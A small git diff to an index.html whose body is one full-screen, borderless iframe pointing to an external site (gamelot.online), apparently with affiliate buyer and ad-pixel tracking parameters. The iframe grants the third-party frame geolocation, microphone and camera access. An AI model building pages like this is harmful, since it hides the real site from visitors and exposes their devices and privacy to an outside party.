--- a/index.html
+++ b/index.html
@@ -19,7 +19,7 @@
 </head>
 
 <body>
-    <iframe id="" title="test" allowtransparency="true" allowfullscreen="true" allow="geolocation; microphone; camera" src="https://gamelot.online/z8vyzYv2?buyer_id=Sergey_Mazur&account=LOG1&pixel=1640674239469443" frameborder="0" style="width: 1px; min-width: 100%; min-height: 100%; position: absolute; border:none;" scrolling="auto"> </iframe>
+    <iframe id="" title="test" allowtransparency="true" allowfullscreen="true" allow="geolocation; microphone; camera" src="https://gamelot.online/8g1r6Ymv?buyer_id=SergeyMazur&account=W2&pixel=1228768297584782" frameborder="0" style="width: 1px; min-width: 100%; min-height: 100%; position: absolute; border:none;" scrolling="auto"> </iframe>
 </body>
 
 </html>
